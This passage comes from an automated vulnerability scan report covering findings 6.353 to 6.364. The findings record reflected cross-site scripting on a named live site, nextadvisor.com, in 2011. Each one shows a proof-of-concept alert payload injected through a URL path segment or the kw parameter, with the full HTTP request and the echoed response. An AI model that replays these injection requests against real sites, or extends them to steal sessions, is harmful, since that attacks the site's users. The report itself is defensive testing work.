User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=4188008f9f9154f752a18764b6f09d95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg.php" />
...[SNIP]...

6.353. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d368"><script>alert(1)</script>a121883116c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=9b2c0adab769e7435ca716e85fa328da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c.php" />
...[SNIP]...

6.354. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312bd"><script>alert(1)</script>b453ad10c5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:16 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=0b2d5ef5edf6176ddbb7555b33b8cff1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg.php" />
...[SNIP]...

6.355. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79021"><script>alert(1)</script>982aa0608fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e3ec558f338fee4db7b551cf98449cb9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg.php" />
...[SNIP]...

6.356. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22 was submitted in the REST URL parameter 2. This input was echoed as 6b593'><img src=a onerror=alert(1)>2fa20870a22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=77f89f3390f07771db738fe244d7fef1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar6b593'><img src=a onerror=alert(1)>2fa20870a22/index.php' class='nav_select'>
...[SNIP]...

6.357. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c41a"><script>alert(1)</script>349ece8baa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=c9c4f40a3f3a57bfe5676297eebc1e47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9.php" />
...[SNIP]...

6.358. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 793b4"><script>alert(1)</script>a2d9ab8e691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php" />
...[SNIP]...

6.359. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a was submitted in the REST URL parameter 1. This input was echoed as 9f7e3'><img src=a onerror=alert(1)>9791e26f04a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includes9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/includes9f7e3'><img src=a onerror=alert(1)>9791e26f04a/index.php' class='nav_select'>
...[SNIP]...

6.360. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88492"><script>alert(1)</script>7ca6639f3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:11:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5" />
...[SNIP]...

6.361. http://www.nextadvisor.com/link.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cce4"><script>alert(1)</script>1a534bed66f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /link.php1cce4"><script>alert(1)</script>1a534bed66f?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:27:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11904


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/link.php1cce4"><script>alert(1)</script>1a534bed66f" />
...[SNIP]...

6.362. http://www.nextadvisor.com/pmid [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad9f"><script>alert(1)</script>0b406646753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid9ad9f"><script>alert(1)</script>0b406646753?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid9ad9f"><script>alert(1)</script>0b406646753" />
...[SNIP]...

6.363. http://www.nextadvisor.com/pmid [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49117"><script>alert(1)</script>f1090dfeda0 was submitted in the kw parameter. This input was echoed as 49117\"><script>alert(1)</script>f1090dfeda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117"><script>alert(1)</script>f1090dfeda0 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117\"><script>alert(1)</script>f1090dfeda0">
...[SNIP]...

6.364. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80329"><script>alert(1)</script>4aaae51729d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid80329"><script>alert(1)</script>4aaae51729d/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
